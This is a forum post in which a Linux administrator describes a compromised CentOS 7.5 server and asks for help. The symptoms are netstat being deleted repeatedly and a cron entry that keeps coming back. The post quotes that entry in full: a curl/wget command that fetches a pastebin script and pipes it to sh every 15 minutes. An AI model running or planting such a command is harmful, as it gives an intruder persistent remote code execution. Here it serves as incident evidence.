Linux 被入侵了该怎么整，入侵者摆明了不怕你知道

今天一觉起来，被报告说有台 CentOS7.5 速度变的很卡。上去一看，没发现 CPU，内存占用有什么很异常的地方，随手敲 netstat -ntlp 准备看看端口占用是不是由异常，结果出现提示：-bash: /usr/bin/netstat: No such file or directory。啊？什么鬼。再一检查 /usr/bin/netstat 文件不存在，我还以为是被不小心删掉了，不管，yum reinstall net-tools 重装网络套件，结果这一装就露出马脚了，/usr/bin/netstat 文件在刚装好的时候是可以用的，几分钟之内，就不翼而飞了，反复几次后，我就明白有什么程序把它给自动删掉了。随后进一步检查发现，
crontab -l 查定时任务发现这样一行代码：绝对不是我设置的
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
打开这个网址发现得到的是一串明显被加密过的字符串，无法进一步排查。删除这个信息，几分钟内会被重新添加。

现在，用 netstat -ntlp 查不出有异常端口，但是我个人怀疑 netstat 很可能已被某种手段屏蔽，证据就是它看不到占用 80 端口的 Nginx （我确定 Nginx 仍然在工作）的 PID(显示为 - )，lsof -i:80 同样失效，我猜测黑客(木马)是打算使用 80 端口的，但是 80 端口跑着 Nginx 导致没成功。机器上的 /usr/bin/netstat 每隔几分钟就被删除，计划任务里始终有那条自动执行请求，我删掉等一会就会自动添加。ps -ef 查不出有异常进程，CPU 和内存均无特别异常，就是系统响应速度慢。我该咋办，除了备份数据重装系统没办法了吗？头一次这么嚣张的 Linux 入侵